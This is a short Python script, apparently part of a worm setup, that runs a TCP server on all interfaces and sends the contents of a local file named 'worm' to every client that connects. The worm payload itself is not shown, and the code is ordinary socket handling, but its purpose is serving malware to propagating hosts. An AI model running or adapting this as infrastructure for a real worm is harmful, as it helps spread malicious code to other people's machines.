#!/usr/bin/env python3
import socket
import sys

# Host and port information
HOST = '0.0.0.0'
PORT = int(sys.argv[1])

# Obtain worm content
with open('worm', 'r') as f:
    worm_content = f.read()

# Set socket information
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((HOST, PORT))
s.listen(5)

print('Service started at: %s:%s' % (HOST, PORT))
print('Server Listening ...')

# TCP connection
while True:
    conn, addr = s.accept()
    print('Connected by ' + str(addr))

    while True:
        indata = conn.recv(1024)
        if len(indata) == 0: # connection closed
            conn.close()
            print('Client connection closed.')
            break
        print('Message Received: ' + indata.decode())

        outdata = worm_content
        conn.send(outdata.encode())

s.close()